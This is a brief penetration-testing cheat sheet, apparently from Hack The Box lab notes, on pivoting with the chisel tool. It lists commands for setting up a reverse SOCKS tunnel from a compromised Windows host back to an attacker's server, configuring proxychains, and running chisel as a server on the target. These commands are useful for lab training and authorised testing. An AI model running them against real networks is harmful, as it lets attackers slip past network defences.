# chisel

### Chisel - Reverse Tunnel

* Attack Host

```bash
./chisel server --reserve

2022/11/06 10:57:00 server: Reverse tunnelling enabled
2022/11/06 10:57:00 server: Fingerprint CelKxt2EsL1SUFnvo634FucIOPqlFKQJi8t/aTjRfWo=
2022/11/06 10:57:00 server: Listening on http://0.0.0.0:8080
```

* Target Host

```shell
C:\Windows\Temp\chisel.exe client <ip_attacker>:8080 R:socks
```

* Verify Listening Port

```shell
dado1513@htb[/htb]$ netstat -lnpt | grep 1080

(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:1080          0.0.0.0:*               LISTEN      446306/./chisel

```

* Configure Proxychains

```shell
dado1513@htb[/htb]$ cat /etc/proxychains.conf

<SNIP>

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5  127.0.0.1 1080
```

* Killing Chisel

```powershell
Stop-Process -Name chisel -Force
```

### Target Host as Server

* Target Host

```powershell
PS> C:\Windows\Temp\chisel.exe server --socks5
```

* Attack Host

```shell
dado1513@htb[/htb]$ sudo chisel client 10.129.204.133:8080 socks

2022/11/22 06:56:01 client: Connecting to ws://10.129.204.133:8080
2022/11/22 06:56:01 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2022/11/22 06:56:02 client: Connected (Latency 124.871246ms)
```